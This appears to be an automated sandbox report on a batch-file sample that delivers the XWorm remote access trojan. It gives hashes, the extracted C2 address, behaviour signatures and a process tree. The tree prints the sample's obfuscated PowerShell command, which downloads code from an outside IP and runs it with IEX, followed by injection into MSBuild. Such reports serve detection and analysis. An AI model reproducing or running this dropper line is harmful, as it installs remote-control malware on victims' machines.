Analysis

  • max time kernel
    94s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 13:56

General

  • Target

    cmd.bat

  • Size

    180B

  • MD5

    b3cede4b5d517877a96f997ef702fb47

  • SHA1

    a4aa92e6231e8ac310b32ecfd6d8f82f3b1c76af

  • SHA256

    450f94a61505838c596764d3e70dce13638ae0086e5695b09264258a859dc42f

  • SHA512

    5d7e73be8121dd8d3374d773d83f1fc553e748ef863a7fc7d914eecae8d1086dcb17dfc14a36ffd00456802af1f708ea19e8c8887203137c6ecf77c7f1239080

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.221/a.mp4

Extracted

Family

xworm

Version

5.0

C2

92.255.57.221:4414

aes.plain

Signatures

  • Detect Xworm Payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cmd.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4132
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$FC1='ject Net.WebCli';$FC2='loadString(''http://92.255.57.221/a.mp4'')';$FC3='ent).Down';$FC4='(New-Ob';$E5=IEX ($FC4,$FC1,$FC3,$FC2 -Join '')|IEX"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ejxaqe2r\ejxaqe2r.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4A8.tmp" "c:\Users\Admin\AppData\Local\Temp\ejxaqe2r\CSC7B59A7462F9148B7AFEE9AD0857BA79E.TMP"
          4⤵
            PID:2080
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          3⤵
            PID:860
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4816

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RESC4A8.tmp

        Filesize

        1KB

        MD5

        087b6a34d3d7b584d66191e0b28052d1

        SHA1

        f7ea5b0da7a913cface870752abbadd9779eea24

        SHA256

        a498c0a7fe23b36b3d3f246808010064d08bf324caa12fb3b77e2a11ae93a808

        SHA512

        e3306b4e216a0aaf9485ac7c25179afacd0254e76febc291d43a26b23fedf46aaaafb542361314bdea007d35a8d25a07d4e787e5fd280407a7ce7d7e0f6cc69f

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zm4roox5.fbf.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\ejxaqe2r\ejxaqe2r.dll

        Filesize

        42KB

        MD5

        ca3b0aa79dc903560f413ecee244854d

        SHA1

        07d2cd95afa546bda0690ed29a4c333219498734

        SHA256

        dac45082626c0dff567f69e85072a9334370e7028f739c6dab9fe3baeb7640c6

        SHA512

        d57424e645fad526042026c777c5e7aae15663b212e15b3dd953639b380bafe709c09d14755d5e005994e3d85a3be26a0e536adb3ff484ed1b9f1cf01b81c358

      • \??\c:\Users\Admin\AppData\Local\Temp\ejxaqe2r\CSC7B59A7462F9148B7AFEE9AD0857BA79E.TMP

        Filesize

        652B

        MD5

        90f97882f62fb0aa3ade3170f2e0288e

        SHA1

        c8ebea1f684fe15c49f75878fe18838428edcb90

        SHA256

        49bbc195da48f064cbe110e9be484211f1b55df3afaf97d940f6b4cd40161e21

        SHA512

        bdf77c10304bac1f73eee5fc9036b5c0a5c02423df9418423b1693ca5cd2cd4c223a3113e48f4910775e3541abaffaa834b36b7e29c74c09ca701ab1dbdd8865

      • \??\c:\Users\Admin\AppData\Local\Temp\ejxaqe2r\ejxaqe2r.0.cs

        Filesize

        103KB

        MD5

        992ab26a03ded91714491d267da55fb2

        SHA1

        25fe04d5493f7e904bd4e64078aa464226e8f393

        SHA256

        3b18772dbf088171f78cccd3da6fb05f46918b2bafa17ab43ea03ec0507935c1

        SHA512

        a1dbfd27e02d10e978475bf9c1279c489e1c9febd8456492e2b0d7df33563c4e81cc28e39f6a90aa82cadc06927bce2f831f2089b5e57da4ea89862a6d82ad0f

      • \??\c:\Users\Admin\AppData\Local\Temp\ejxaqe2r\ejxaqe2r.cmdline

        Filesize

        204B

        MD5

        2a0085c1b3e6523014f1400f57ab7098

        SHA1

        68eecca2f7ca19027f26d2e1a1169e7cc9314a89

        SHA256

        e1a2347d80afd8ca8ea42ea1e4316dea04eb9e9d878ee9e49773fb4ff1842687

        SHA512

        fc3329ea8ed3c2238233653d18301689fa38962f40be73a472700b4c546f4d70cd8ff34d0f8e09f07539330f18086202af3c3cb115fd72912f5a14fff90013dd

      • memory/2620-12-0x00007FFD5D340000-0x00007FFD5DE01000-memory.dmp

        Filesize

        10.8MB

      • memory/2620-13-0x0000025357730000-0x0000025357798000-memory.dmp

        Filesize

        416KB

      • memory/2620-0-0x00007FFD5D343000-0x00007FFD5D345000-memory.dmp

        Filesize

        8KB

      • memory/2620-11-0x00007FFD5D340000-0x00007FFD5DE01000-memory.dmp

        Filesize

        10.8MB

      • memory/2620-10-0x00000253550C0000-0x00000253550E2000-memory.dmp

        Filesize

        136KB

      • memory/2620-26-0x00000253550F0000-0x0000025355100000-memory.dmp

        Filesize

        64KB

      • memory/2620-31-0x00007FFD5D340000-0x00007FFD5DE01000-memory.dmp

        Filesize

        10.8MB

      • memory/4816-28-0x0000000000400000-0x000000000040E000-memory.dmp

        Filesize

        56KB

      • memory/4816-32-0x00000000056B0000-0x000000000574C000-memory.dmp

        Filesize

        624KB

      • memory/4816-33-0x0000000005DB0000-0x0000000005E16000-memory.dmp

        Filesize

        408KB

      • memory/4816-34-0x00000000068F0000-0x0000000006982000-memory.dmp

        Filesize

        584KB

      • memory/4816-35-0x0000000006F40000-0x00000000074E4000-memory.dmp

        Filesize

        5.6MB